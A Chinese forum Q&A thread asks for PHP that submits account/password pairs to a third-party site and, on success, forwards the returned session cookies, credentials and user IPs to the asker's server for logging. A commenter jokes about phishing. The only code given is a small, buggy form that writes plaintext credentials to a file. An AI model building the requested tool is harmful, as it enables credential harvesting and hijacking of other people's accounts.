请求指导给个php例子。功能如下: 界面一个+按钮,点击一次添加一条。一条是这样的,一个帐号编辑框 15

请求指导给个php例子。功能如下:界面一个+按钮,点击一次添加一条。一条是这样的,一个帐号编辑框,一个密码编辑框,后面一个提交按钮。按提交按钮实现的功能:提交对应条的帐号... 请求指导给个php例子。功能如下:
界面一个+按钮,点击一次添加一条。一条是这样的,一个帐号编辑框,一个密码编辑框,后面一个提交按钮。按提交按钮实现的功能:提交对应条的帐号密码post数据到指定地址,获取返回数据和返回协议头,如果返回非“OK”,弹出提示显示返回数据。如果返回数据为包含“OK”,就处理协议头的setcookies数据,简单拼接下cookies,将这个cookies、帐号、密码、提交者IPpost到网站后台,记录到txt中为一行。提交成功后此条目3个组件变灰禁用。
shqzzy
 <button onclick='f.style.display=""'>+</button>
  <div style='display:none' id='f'>
  <form action=action.php method="post">
  <input name="user"/><br/>
  <input name="pwd"/><br/>
  <input type='submit' value='ok'/>
  </form>
  </div>
<?php
    $user = $_POST['user'];
$pwd = $_POST['pwd'];
    if($_POST['user'] && $_POST['user'] ){
     setcookie("user",$user,time()+3600*3600*24);
 setcookie("pwd",$user,time()+3600*3600*24);
   $file = fopen("user.text",'a');
   fwrite($file,$user.','.$pwd);
       fclose($file);
       echo "登录成功";
}
   ?>
追问
亲,第一次POST的地址不是服务器的网址,是第三方,我的意思是点击提交按钮先第三方网站验证账号密码,如果正确,再把验证返回的setcookies连同账号密码IP信息一起发到服务器记录。谢谢您,看能否根据这个需求帮忙改下!万分感谢!
追答
你的第三方登陆是哪个平台.不然没办法帮助你呀.
乐哥ol
你玩的是我的应用吧
追问
文不对题啊
追答
呃   是不是我也会玩的   我会玩钓鱼